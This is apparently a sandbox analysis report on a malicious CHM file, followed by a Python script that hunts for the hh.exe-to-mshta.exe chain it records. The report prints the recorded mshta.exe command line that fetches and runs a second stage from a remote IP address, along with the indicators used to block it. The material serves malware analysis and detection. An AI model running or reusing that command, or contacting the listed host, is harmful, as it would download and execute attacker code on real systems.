Analysis
- max time kernel: 135s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20230221-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 21-03-2023 23:32
Behavioral tasks (this report covers behavioral6; the Korean file name reads roughly "LG U+ _ mobile telecommunications _ 202208 _ <partial personal name>", kept as-is below because it is the sample identifier)
- behavioral1: LG유플러스_이동통신_202208_이_선.html on win7-20230220-en
- behavioral2: LG유플러스_이동통신_202208_이_선.html on win10v2004-20230220-en
- behavioral3: LG유플러스_이동통신_202208_이_선.html.lnk on win7-20230220-en
- behavioral4: LG유플러스_이동통신_202208_이_선.html.lnk on win10v2004-20230220-en
- behavioral5: MAIL_20230125151802.chm on win7-20230220-en
- behavioral6: MAIL_20230125151802.chm on win10v2004-20230221-en
- behavioral7: Message.chm on win7-20230220-en
- behavioral8: Message.chm on win10v2004-20230220-en
- behavioral9: Message.chm on win7-20230220-en
- behavioral10: Message.chm on win10v2004-20230220-en
General
- Target: MAIL_20230125151802.chm
- Size: 10KB
- MD5: 45bd3001517f5e913ddde83827f4cc29
- SHA1: 710a7d78c4bbca17d6cefce8c392e7d358c37a8d
- SHA256: c80fbab8c27cb9be91885a470377088d6639b95b85dfe5ae3c346e537b143a87
- SHA512: c2dcf7d3d6e1353fe6259e326517c07c2e168bc83c0847c293d15d2a0fcc0bbec31506de2347b45a6455465d88a27bde68179352c4473a8eac7ce63b3581bb75
- SSDEEP: 48:U5yGg202QRlEFlErlElZO5sD7GH6N6xWX3VGJtihAxkNzY94ApKSE7HWVMjUBxBD:U5y6khHq6UMl94A0AMjUBxBjR7UyEf0
Malware Config
- Extracted URL: http://141.105.65.165/data/3.html
Signatures
- Blocklisted process makes network request (1 IoC)
  Process: mshta.exe, flow 20, PID 4424
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Process: hh.exe, PID 4656 (two events)
- Suspicious use of WriteProcessMemory (2 IoCs)
  hh.exe (PID 4656) wrote to memory of mshta.exe (PID 4424) (two events)
  Note: a parent writing into a child it has just created is normal CreateProcess behaviour, so this entry on its own is a weak signal; the telling part is which child hh.exe created and what it was told to load.
Processes
1. C:\Windows\hh.exe
   Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\MAIL_20230125151802.chm
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\mshta.exe (child of 1)
      Command line: "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/3.html ,
      - Blocklisted process makes network request

The chain is the whole story of this sample: the HTML Help viewer (hh.exe) opens the 10 KB CHM and launches mshta.exe against a remote URL, so the second stage is fetched from 141.105.65.165 at run time rather than carried inside the CHM. The trailing " ," is part of the recorded command line. Detection should therefore key on hh.exe spawning mshta.exe with a URL argument, and 141.105.65.165 / the /data/3.html path are the network indicators to hunt for.
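Added example, not part of the sandbox report: a small hunt over process-creation events that flags the chain shown above (hh.exe opening a .chm, then spawning mshta.exe with a remote URL) and pulls the URL out as an indicator. The events are constructed in a simplified Sysmon Event ID 1 layout; the field names, the timestamps, and the PIDs and paths of the benign rows are assumptions, while the first two rows mirror the report's process tree.

```python
"""Hunt for the hh.exe -> mshta.exe chain from the report in process-creation logs.

Added example (not part of the sandbox report). Events are constructed in a
simplified Sysmon Event ID 1 layout; field names, timestamps and the benign
rows are assumptions. The first two rows mirror the report's process tree.
"""
import ntpath
import re
from typing import Any, Dict, List, Optional

Event = Dict[str, Any]

SAMPLE_EVENTS: List[Event] = [
    # The report's chain: HTML Help viewer opens the .chm ...
    {"utc_time": "2023-03-21 23:33:01", "pid": 4656, "ppid": 1000,
     "image": r"C:\Windows\hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\MAIL_20230125151802.chm'},
    # ... and spawns mshta.exe against a remote URL (trailing " ," as recorded).
    {"utc_time": "2023-03-21 23:33:02", "pid": 4424, "ppid": 4656,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://141.105.65.165/data/3.html ,'},
    # Constructed benign noise: a vendor help file with no child process ...
    {"utc_time": "2023-03-21 23:35:00", "pid": 5000, "ppid": 1000,
     "image": r"C:\Windows\hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" "C:\Program Files\Vendor\help.chm"'},
    # ... and mshta.exe run on a local .hta, not under hh.exe.
    {"utc_time": "2023-03-21 23:36:00", "pid": 5100, "ppid": 1000,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Windows\System32\example.hta'},
]

URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"',]+", re.IGNORECASE)
# A quoted path may contain spaces; an unquoted one runs to the next space.
CHM_RE = re.compile(r'"([^"]+\.chm)"|(\S+\.chm)', re.IGNORECASE)


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def chm_argument(cmdline: str) -> Optional[str]:
    """The .chm path hh.exe was launched with, or None."""
    m = CHM_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def parent_of(child: Event, events: List[Event]) -> Optional[Event]:
    """Most recent process with the child's PPID created no later than the child.

    Keying a dict on PID alone goes wrong once PIDs are reused in the log window.
    """
    candidates = [e for e in events
                  if e["pid"] == child["ppid"] and e["utc_time"] <= child["utc_time"]]
    return max(candidates, key=lambda e: e["utc_time"], default=None)


def find_chm_to_hta(events: List[Event]) -> List[Dict[str, Any]]:
    """Flag mshta.exe started by hh.exe.

    'high' when mshta.exe received a URL (second stage fetched at run time, as
    in the report); 'medium' for a local .hta, which still deserves a look.
    """
    findings: List[Dict[str, Any]] = []
    for child in events:
        if basename(child["image"]) != "mshta.exe":
            continue
        parent = parent_of(child, events)
        if parent is None or basename(parent["image"]) != "hh.exe":
            continue
        url = URL_RE.search(child["cmdline"])
        findings.append({
            "utc_time": child["utc_time"],
            "parent_pid": parent["pid"],
            "child_pid": child["pid"],
            "chm": chm_argument(parent["cmdline"]),
            "url": url.group(0) if url else None,
            "severity": "high" if url else "medium",
        })
    return findings


def network_iocs(findings: List[Dict[str, Any]]) -> List[str]:
    """Unique URLs handed to mshta.exe, in first-seen order, for blocking and hunting."""
    seen: List[str] = []
    for f in findings:
        if f["url"] and f["url"] not in seen:
            seen.append(f["url"])
    return seen


if __name__ == "__main__":
    hits = find_chm_to_hta(SAMPLE_EVENTS)
    for h in hits:
        print(h)
    print("IOCs:", network_iocs(hits))
```

The rule deliberately ignores hh.exe and mshta.exe on their own (both are common on a workstation) and fires only on the parent/child relationship, with the URL argument as the severity driver; against the constructed events it reports exactly the 4656 -> 4424 pair and the single URL from the report.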